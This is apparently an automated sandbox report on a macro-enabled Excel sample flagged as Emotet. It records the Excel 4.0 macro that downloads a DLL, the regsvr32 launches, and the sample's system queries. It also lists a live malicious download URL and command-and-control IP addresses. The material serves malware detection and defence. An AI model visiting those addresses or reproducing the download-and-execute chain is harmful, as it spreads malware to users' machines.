Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 3.1 %
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100492F7 FindFirstFileA,FindClose, 3_2_100492F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100489BD __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 3_2_100489BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004168D2 FindFirstFileW, 5_2_004168D2
Source: C:\Windows\SysWOW64\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: regsvr32.exe, 00000004.00000002.470572841.00000000003C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_100657FF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100011EF ??3@YAXPAX@Z,??3@YAXPAX@Z,GetProcessHeap,HeapFree, 3_2_100011EF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10021DEA SetUnhandledExceptionFilter, 3_2_10021DEA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10021DFC SetUnhandledExceptionFilter, 3_2_10021DFC

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 68.183.94.239 80 Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd" Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte, 3_2_1002904C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 3_2_1002910F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale, 3_2_10026143
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesA, 3_2_10026318
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesA, 3_2_100265A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesA, 3_2_100266B6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA, 3_2_100268AA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 3_2_10028F39
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 3_2_10028FF6
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001CE60 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 3_2_1001CE60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10023F2F GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 3_2_10023F2F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10064D73 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 3_2_10064D73

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 5.2.regsvr32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 601134 Sample: qd_34768.xlsm Startdate: 31/03/2022 Architecture: WINDOWS Score: 100 38 Multi AV Scanner detection for domain / URL 2->38 40 Antivirus detection for URL or domain 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 12 other signatures 2->44 8 EXCEL.EXE 7 19 2->8         started        process3 dnsIp4 34 eles-tech.com 185.46.40.47, 49165, 80 TELLCOM-ASTR Turkey 8->34 24 C:\Users\user\xewn.dll, PE32 8->24 dropped 26 C:\Users\user\...\eVzUZ7dv5zBAXa5[1].dll, PE32 8->26 dropped 28 C:\Users\user\Desktop\~$qd_34768.xlsm, data 8->28 dropped 48 Document exploit detected (creates forbidden files) 8->48 50 Document exploit detected (UrlDownloadToFile) 8->50 13 regsvr32.exe 2 8->13         started        file5 signatures6 process7 file8 30 C:\Windows\SysWOW64\...\qayqfx.jrd (copy), PE32 13->30 dropped 52 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->52 17 regsvr32.exe 1 13->17         started        signatures9 process10 signatures11 36 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->36 20 regsvr32.exe 2 17->20         started        process12 dnsIp13 32 68.183.94.239, 49166, 80 DIGITALOCEAN-ASNUS United States 20->32 46 System process connects to network (likely due to code injection or exploit) 20->46 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
68.183.94.239
 unknown United States
14061 DIGITALOCEAN-ASNUS true
185.46.40.47
 eles-tech.com Turkey
34984 TELLCOM-ASTR true

Contacted Domains

Name IP Active
eles-tech.com 185.46.40.47 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://eles-tech.com/css/KzMysMqFMs/ true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown